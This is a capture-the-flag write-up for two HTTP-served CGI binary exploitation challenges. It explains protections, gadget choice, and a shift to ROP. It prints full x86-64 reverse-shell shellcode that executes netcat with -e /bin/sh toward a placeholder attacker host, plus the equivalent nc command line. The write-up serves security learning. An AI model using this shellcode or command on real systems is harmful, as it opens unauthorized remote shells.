Note: the binary should have an executable stack and minimal hardening, the goal is RCE
Author: ron
Analysis
unlike the usual PWN challenges, instead of giving a connection string through tcp or netcat, we're given a link to HTTP.
visiting the website, it seems to be a static one as shown below
presented with a password form, I tried to submit it with a gibberish input, and got the response as shown below
we can see what is being sent through by capturing the request in BurpSuite
on the CTF platform, they gave us a binary called auth.cgi which seems to be what is handling our input indicated by the endpoint of our request, let's see what it is
└──╼ [★]$ file auth.cgi
auth.cgi: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=c0053266aea9379cfe6a46dee6f69fb9c721f69e, for GNU/Linux 3.2.0, with debug_info, not stripped
└──╼ [★]$ pwn checksec auth.cgi
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
it's missing every security mechanism (I have no idea why it says there's canary, but there's actually none), the binary itself is very simple with only a main function
this will be handy since the binary is taking the read size through the process environment variables.
otherwise if we wish to send the payload to the remote server, we can use python's requests library, and the CONTENT_LENGTH will be automatically handled for us.
import requests
res = requests.post(URL, data=payload)
Exploitation
to gain RCE the usual system("/bin/sh") or execve("/bin/sh", NULL, NULL) won't work. we don't establish a two way persistent communication using socks or other way.
Not to say though I'm not sure on this, there might be a change that our input is handled by a different application and forwarded to the actual challenge binary, spawning a shell would just mean spawning it in the server's local process with no actual communication is happening to us.
so the goal is to execute a Reverse Shell which is different and can be visualized with the picture below
Note: I'am aware that this is not 100% correct, but I think it serve enough purpose to understand what's going on given the current context
there's many reverse shell payload out there, but since we're able to execute shellcode with no restriction, I just took one from the link below
next is to find a gadget that would execute our shellcode within the stack, since the binary is statically compiled, we have tons of options though one that crossed my first though: jmp rsp is not to be found.
however we do have call rsp which in practice, does the same thing
next, we need for our machine to listen for connection and send the shellcode against the remote server
BITS 64
DEFAULT REL
section .text
global _start
_start:
xor rdx,rdx
mov rdi,0x636e2f6e69622fff
shr rdi,0x08
push rdi
mov rdi,rsp
mov rcx,0x68732f6e69622fff
shr rcx,0x08
push rcx
mov rcx,rsp
mov rbx,0x652dffffffffffff
shr rbx,0x30
push rbx
mov rbx,rsp
mov r10,0x37333331ffffffff
shr r10,0x20
push r10
mov r10,rsp
jmp short ip
continue:
pop r9
push rdx ;push NULL
push rcx ;push address of 'bin/sh'
push rbx ;push address of '-e'
push r10 ;push address of '1337'
push r9 ;push address of 'ip'
push rdi ;push address of '/bin/nc'
mov rsi,rsp
mov al,59
syscall
ip:
call continue
db "ATTACKER"
Flag: CTF{certified-genuine-instructions}
Can't Give In (secure)
Description
Can you get a shell?
Note: this is similar to cant-give-in, but the stack is no longer executable
Flag is located in: /home/ctf/flag.txt
Author: ron
Binary Analysis
the binary and overall environment is the same as the previous challenge, however one thing different is that this time the binary has NX enabled
└──╼ [★]$ file auth.cgi
auth.cgi: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=0519198742c4cfaf17998361e320132e208492c0, for GNU/Linux 3.2.0, with debug_info, not stripped
└──╼ [★]$ pwn checksec auth.cgi
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
Exploitation
the idea is still the same, however the execution is different, instead of shellcoding, we will ROP instead.
what the above shellcode does is equivalent to the following command in linux terminal:
/bin/nc /bin/nc <attacker_ip> 1337 -e /bin/sh
the port used by the shellcode I linked above uses 1337 while what I used in this challenge is 9001
this would quite be trivial or easy to do if we have system() as we just pass the string to it. However the static binary doesn't have that symbol. Instead we have to manually craft it into execve()
according to the manual execve() takes 3 parameters
I would however, retype it as execve(char *, char *[], char *[]) to make it more intuitive as it is a pointer to an array containing the parameters or environment variables you wish to pass to the executable.
which means to execute the reverse shell payload, we would need to prepare our arguments such that when calling it would be:
I've interacted with this kind of challenge before where the binary exploitation is through the HTTP medium in , I will use roughly the same script to setup my local debugging environment.
